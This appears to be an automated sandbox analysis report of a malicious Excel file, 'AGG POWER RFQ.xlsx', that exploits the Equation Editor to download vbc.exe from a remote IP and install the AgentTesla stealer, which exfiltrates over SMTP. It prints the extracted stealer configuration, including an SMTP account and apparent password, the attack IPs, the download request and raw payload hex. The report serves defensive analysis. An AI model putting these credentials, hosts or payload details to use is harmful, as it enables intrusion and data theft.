Windows Analysis Report AGG POWER RFQ.xlsx

AV Detection:

Found malware configuration

Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales5@alkhaleejautoparts.com]~%l3$ck*(U_mail.alkhaleejautoparts.comlisafury29@safina.cc"}

Multi AV Scanner detection for submitted file

Source: AGG POWER RFQ.xlsx	Virustotal: Detection: 27%			Perma Link
Source: AGG POWER RFQ.xlsx	ReversingLabs: Detection: 21%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: mail.alkhaleejautoparts.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 148.66.138.106:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 148.66.138.106:587

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:20:52 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 05:38:46 GMTETag: "111a00-5c4db81175295"Accept-Ranges: bytesContent-Length: 1120768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 8e c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 8a 0c 00 00 8e 04 00 00 00 00 00 3e a9 0c 00 00 20 00 00 00 c0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 a8 0c 00 4b 00 00 00 00 c0 0c 00 00 8b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 0c 00 00 00 a2 a8 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 89 0c 00 00 20 00 00 00 8a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 8b 04 00 00 c0 0c 00 00 8c 04 00 00 8c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 11 00 00 02 00 00 00 18 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 a9 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 27 01 00 e8 04 01 00 03 00 00 00 01 00 00 06 f4 2b 02 00 ae 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 14 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bf 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 28 06 00 00 06 28 05 00 00 06 39 9c 00 00 00 26 20 04 00 00 00 38 67 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 17 3a 55 00 00 00 26 02 16 28 08 00 00 06 20 01 00 00 00 28 05 00 00 06 3a 3e 00 00 00 26 02 16 28 07 00 00 06 20 06 00 00 00 38 2c 00 00 00 02 16 28 11 00 00 0a 20 05 00 00 00 16 39 1a 00 00 00 26 02 16 28 09 00 00 06 38 32 00 00 00 20 04 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 9e ff ff ff c2 ff ff ff af ff ff ff 00 00 00 00 9e ff ff ff 74 ff ff ff 87 ff ff ff 10 00 00 00 38 aa ff ff ff 26 20 02 00 00 00 38 cb ff ff ff 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0e 00 00 06 28 0f 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 148.66.138.106 148.66.138.106

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.146Connection: Keep-Alive

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.141.146

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7AB3B46.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.146Connection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: mail.alkhaleejautoparts.com

URLs found in memory or binary data

Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp	String found in binary or memory: http://DTHLcG.com
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2367250713.0000000002894000.00000004.00000001.sdmp	String found in binary or memory: http://gN3yhO7qZ2vk1Dl2x8.com
Source: vbc.exe, 00000005.00000002.2367334115.00000000028BB000.00000004.00000001.sdmp	String found in binary or memory: http://mail.alkhaleejautoparts.com
Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2155151223.0000000002401000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221949010.0000000002401000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2367072067.00000000027C8000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tnvLnx.exe	String found in binary or memory: https://github.com/georgw777/
Source: tnvLnx.exe	String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000000.2148405134.0000000000AD2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2366734790.0000000000AD2000.00000020.00020000.sdmp, tnvLnx.exe, 00000006.00000002.2221233725.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000007.00000000.2220311506.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp	String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the 15 h . ' yellow bar above ,, This document is a ' 3. Once you have enab

.NET source code contains very large array initializations

Source: 5.2.vbc.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6F25B528u002d9522u002d4753u002dAD5Du002d2EB6462D9D13u007d/D22EEAA0u002d99FFu002d4867u002dB695u002dA5CAAFF01E6A.cs

Large array initialization: .cctor: array initializer size 11963

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B9020		4_2_002B9020
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002BBB10		4_2_002BBB10
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002BDBA0		4_2_002BDBA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B549A		4_2_002B549A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002BFBB0		4_2_002BFBB0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B2CC0		4_2_002B2CC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B4EA0		4_2_002B4EA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002BAEEF		4_2_002BAEEF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02004668		4_2_02004668
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0200927F		4_2_0200927F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020062AB		4_2_020062AB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020062D8		4_2_020062D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020002E9		4_2_020002E9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020002F8		4_2_020002F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02006F79		4_2_02006F79
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02006F88		4_2_02006F88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02000007		4_2_02000007
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02009424		4_2_02009424
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02001027		4_2_02001027
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02000048		4_2_02000048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02001058		4_2_02001058
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02004C59		4_2_02004C59
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02004C88		4_2_02004C88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020004C8		4_2_020004C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020004D8		4_2_020004D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02005CD9		4_2_02005CD9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02005CE8		4_2_02005CE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0200490D		4_2_0200490D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02005530		4_2_02005530
Source: C:\Users\Public\vbc.exe	Code function: 4_2_02005540		4_2_02005540
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020059DF		4_2_020059DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_020059F0		4_2_020059F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0022E240		5_2_0022E240
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0022DAE8		5_2_0022DAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00225330		5_2_00225330
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00226350		5_2_00226350
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00225678		5_2_00225678
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0022E818		5_2_0022E818
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00222099		5_2_00222099
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0079478A		5_2_0079478A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C0048		5_2_007C0048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C9A28		5_2_007C9A28
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C9160		5_2_007C9160
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C33B0		5_2_007C33B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C89A0		5_2_007C89A0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C0023		5_2_007C0023
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007CB2F8		5_2_007CB2F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C3B70		5_2_007C3B70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C7368		5_2_007C7368
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007C3B6B		5_2_007C3B6B
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00529020		6_2_00529020
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0052C308		6_2_0052C308
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0052BB10		6_2_0052BB10
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0052DBA0		6_2_0052DBA0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0052549A		6_2_0052549A
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0052FBB0		6_2_0052FBB0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00522CC0		6_2_00522CC0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0052AEEF		6_2_0052AEEF
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00524EA0		6_2_00524EA0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00711058		6_2_00711058
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00710048		6_2_00710048
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00719424		6_2_00719424
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00715CE8		6_2_00715CE8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00715CD9		6_2_00715CD9
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_007104D8		6_2_007104D8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_007104C8		6_2_007104C8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00714C88		6_2_00714C88
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00715540		6_2_00715540
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0071490D		6_2_0071490D
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_007159F0		6_2_007159F0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_0071927F		6_2_0071927F
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00714668		6_2_00714668
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00714600		6_2_00714600
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_007102F8		6_2_007102F8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_007162D8		6_2_007162D8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 6_2_00716F88		6_2_00716F88
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_00446350		7_2_00446350
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_00445330		7_2_00445330
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_00442099		7_2_00442099
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 7_2_00445678		7_2_00445678
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00379020		8_2_00379020
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_0037BB10		8_2_0037BB10
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_0037DBA0		8_2_0037DBA0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_0037549A		8_2_0037549A
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_0037FBB0		8_2_0037FBB0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00372CC0		8_2_00372CC0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00374EA0		8_2_00374EA0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_0037AEEF		8_2_0037AEEF
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00711058		8_2_00711058
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00710048		8_2_00710048
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00715CE8		8_2_00715CE8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00715CD9		8_2_00715CD9
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_007104D8		8_2_007104D8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_007104C8		8_2_007104C8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00714C88		8_2_00714C88
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00715540		8_2_00715540
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_0071490D		8_2_0071490D
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_007159F0		8_2_007159F0
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00714600		8_2_00714600
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_007102F8		8_2_007102F8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_007162D8		8_2_007162D8
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 8_2_00716F88		8_2_00716F88
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 9_2_00205330		9_2_00205330
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 9_2_00206350		9_2_00206350
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 9_2_00202099		9_2_00202099
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe	Code function: 9_2_00205678		9_2_00205678

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: AGG POWER RFQ.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tnvLnx.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tnvLnx.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tnvLnx.exe.5.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

